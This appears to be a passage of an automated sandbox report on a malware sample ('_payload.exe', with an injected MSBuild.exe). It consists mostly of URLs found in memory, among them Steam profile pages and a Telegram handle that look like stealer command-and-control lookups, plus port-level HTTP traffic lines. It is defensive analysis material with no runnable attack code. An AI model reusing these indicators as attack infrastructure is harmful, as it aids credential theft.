00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: JDAKJD.0.dr	String found in binary or memory: https://support.mozilla.org
Source: JDAKJD.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JDAKJD.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1843666426.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1853924998.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349510250.0000000019ABC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001404000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp, CFCFHJ.0.dr, IIIEBG.6.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: CFCFHJ.0.dr, IIIEBG.6.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1843666426.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1853924998.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349510250.0000000019ABC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001404000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp, CFCFHJ.0.dr, IIIEBG.6.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: CFCFHJ.0.dr, IIIEBG.6.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17lity
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ontdrvhost.exe
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	String found in binary or memory: https://t.me/armad2a
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000004FA000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000004FA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/:
Source: JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000004FA000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/BKECAAKJKF
Source: JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2006550164.0000000025466000.00000004.00000020.00020000.00000000.sdmp, JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2006550164.0000000025466000.00000004.00000020.00020000.00000000.sdmp, JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
